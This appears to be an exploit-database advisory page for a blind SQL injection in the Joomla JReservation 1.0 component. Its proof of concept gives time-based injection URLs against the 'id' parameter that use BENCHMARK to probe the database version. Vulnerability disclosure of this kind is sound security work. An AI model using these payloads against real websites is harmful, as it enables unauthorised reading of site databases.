Joomla (JReservation) BLIND SQL Injection Vulnerability

vendor:

Joomla (JReservation)

by:

B-HUNT3|2

5,5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Joomla (JReservation)

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Joomla (JReservation) BLIND SQL Injection Vulnerability

Input var id is vulnerable to SQL Code Injection. It allows an attacker to execute arbitrary SQL queries. Proof of concept is provided in the text.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (JReservation) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: N/A

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.0
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://server/cd-hotel/index.php?option=com_content&view=article&id=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> http://server/cd-hotel/index.php?option=com_content&view=article&id=46+AND+1=if(substring(@@version,1,1)=4,BENCHMARK(9999999,md5(@@version)),1)%23
[~]>> http://server/cd-hotel/index.php?option=com_content&view=article&id=46+AND+1=if(substring(@@version,1,1)=5,BENCHMARK(9999999,md5(@@version)),1)%23

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...